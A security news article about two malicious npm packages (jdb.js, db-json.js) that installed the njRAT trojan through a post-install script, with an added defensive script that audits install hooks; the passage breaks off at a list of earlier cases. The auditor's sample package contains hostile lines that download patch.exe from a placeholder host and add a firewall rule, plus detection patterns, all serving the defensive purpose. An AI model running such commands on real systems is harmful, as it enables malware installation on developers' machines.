Malicious npm packages caught installing remote access trojans

JavaScript and Node.js developers who installed the jdb.js and db-json.js packages were infected with the njRAT malware.


The security team behind the "npm" repository for JavaScript libraries removed two npm packages this Monday for containing malicious code that installed a remote access trojan (RAT) on the computers of developers working on JavaScript projects.

The two packages were named jdb.js and db-json.js. Both were created by the same author and described themselves as tools to help developers work with JSON files of the kind typically generated by database applications.


Both packages were uploaded to the npm package registry last week and were downloaded more than 100 times before their malicious behavior was detected by Sonatype, a company that regularly scans package repositories for malicious code.

According to Sonatype's Ax Sharma, the two packages contained a malicious script that ran automatically when a developer installed either of the two libraries.

The post-install script performed basic reconnaissance of the infected host and then attempted to download and run a file named patch.exe (VT scan), which in turn installed njRAT, also known as Bladabindi, a very popular remote access trojan that has been used in espionage and data theft operations since 2015.

According to Sharma, the patch.exe loader also added a rule to the local Windows firewall allowing traffic to its command and control (C&C) server, so that the njRAT download would not be blocked, before checking in with its operator and fetching the RAT.

All of this behavior lived in the jdb.js package alone; the second package, db-json.js, simply loaded the first, a layer of indirection meant to disguise the malicious behavior.
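The mechanism described above, an npm lifecycle hook that runs at install time and a second package that merely pulls in the first, is something a reviewer can check for before running `npm install`. The script below is an added example written for this page; it is not code from the article, from Sonatype or from the npm security team, and the package contents it scans are constructed for illustration, not the real jdb.js or db-json.js files. It flags any `preinstall`/`install`/`postinstall`/`prepare` script, reads the local file such a script invokes, looks for the behaviours the write-up describes (host reconnaissance, fetching a Windows executable, spawning processes, touching the Windows firewall), and propagates a "suspicious" verdict to packages that depend on a flagged one. The indicator patterns are heuristics, not signatures for njRAT or patch.exe.

```javascript
// Added example: audit npm package manifests for install-time hooks.
// Not the article's, Sonatype's or npm's code; sample packages are constructed.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic indicators for the behaviours the jdb.js write-up describes.
const INDICATORS = [
  { name: 'host reconnaissance', re: /\bos\.(hostname|userInfo|platform|networkInterfaces)\s*\(/ },
  { name: 'downloads executable', re: /https?:\/\/[^\s"'`]+\.exe\b/i },
  { name: 'runs external process', re: /\b(child_process|execSync|spawnSync|exec|spawn)\b/ },
  { name: 'modifies Windows firewall', re: /netsh\s+advfirewall|New-NetFirewallRule/i },
];

// Resolve the local file a lifecycle command runs, e.g. "node install.js" -> "install.js".
function scriptFileFor(command) {
  const m = /^\s*node\s+(?:--\S+\s+)*(\S+\.js)\b/.exec(command);
  return m ? m[1] : null;
}

// pkg = { manifest: { name, version, scripts, dependencies }, files: { path: source } }
function auditPackage(pkg) {
  const scripts = pkg.manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (!(hook in scripts)) continue;
    const command = scripts[hook];
    const file = scriptFileFor(command);
    // Scan both the command line and the script body it points at.
    const body = command + '\n' + (file && pkg.files[file] ? pkg.files[file] : '');
    const indicators = INDICATORS.filter(i => i.re.test(body)).map(i => i.name);
    findings.push({ hook, command, file, indicators });
  }
  return {
    name: pkg.manifest.name,
    findings,
    // Any install-time hook deserves a look; indicator hits raise the severity.
    verdict: findings.some(f => f.indicators.length) ? 'suspicious'
           : findings.length ? 'review' : 'clean',
  };
}

// Audit a set of packages and propagate suspicion through dependencies:
// a package that only depends on a suspicious one (the db-json.js -> jdb.js
// pattern) inherits the verdict, because installing it installs the hook too.
function auditTree(pkgs) {
  const results = new Map(pkgs.map(p => [p.manifest.name, auditPackage(p)]));
  let changed = true;
  while (changed) {
    changed = false;
    for (const p of pkgs) {
      const r = results.get(p.manifest.name);
      for (const dep of Object.keys(p.manifest.dependencies || {})) {
        const d = results.get(dep);
        if (d && d.verdict === 'suspicious' && r.verdict !== 'suspicious') {
          r.verdict = 'suspicious';
          r.via = dep;
          changed = true;
        }
      }
    }
  }
  return results;
}

// Constructed sample packages with hypothetical names and contents.
const SAMPLE_PACKAGES = [
  {
    manifest: { name: 'json-helper-x', version: '1.0.0', scripts: { postinstall: 'node install.js' } },
    files: { 'install.js': [
      "const os = require('os');",
      "const { execSync } = require('child_process');",
      "const info = os.hostname() + ' ' + os.userInfo().username;",
      "execSync('curl -o patch.exe http://example.invalid/patch.exe');",
      "execSync('netsh advfirewall firewall add rule name=x dir=out action=allow remoteip=203.0.113.5');",
    ].join('\n') },
  },
  {
    manifest: { name: 'json-helper-y', version: '1.0.0', dependencies: { 'json-helper-x': '^1.0.0' } },
    files: { 'index.js': "module.exports = require('json-helper-x');" },
  },
  { manifest: { name: 'honest-lib', version: '2.0.0', scripts: { test: 'node test.js' } }, files: {} },
];

// One report line per package.
function report(pkgs) {
  return [...auditTree(pkgs)].map(([name, r]) =>
    `${name}: ${r.verdict}${r.via ? ` (via ${r.via})` : ''}` +
    r.findings.map(f => `; ${f.hook}: ${f.indicators.join(', ') || 'no indicators'}`).join(''));
}

console.log(report(SAMPLE_PACKAGES).join('\n'));
```

Pointing `auditTree` at real packages means reading each `package.json` and the file its hook names out of `node_modules` or a registry tarball; `npm install --ignore-scripts` is the blunt alternative when a hook has not yet been reviewed.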

Npm security team: Change all passwords

Because a RAT infection is by definition a severe incident, the npm security team's advisories on Monday told web developers who had installed either of the two packages to treat their systems as fully compromised.

"Any computer that has this package installed or running should be considered fully compromised," the npm team said.

"All secrets and keys stored on that computer should be rotated immediately from a different computer.

"The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it," they also added.

Constant onslaught

The npm security team publishes security advisories every week, but most of them cover ordinary vulnerabilities in a package's code that could be exploited in the future, not packages built to be malicious.

Since late August, however, the team has seen a growing number of npm libraries deliberately assembled to steal data from the systems that install them. This suggests that several threat actors are now targeting programmers' workstations, whether to steal credentials for sensitive projects, source code and intellectual property, or to prepare larger supply chain attacks.

Previous cases include: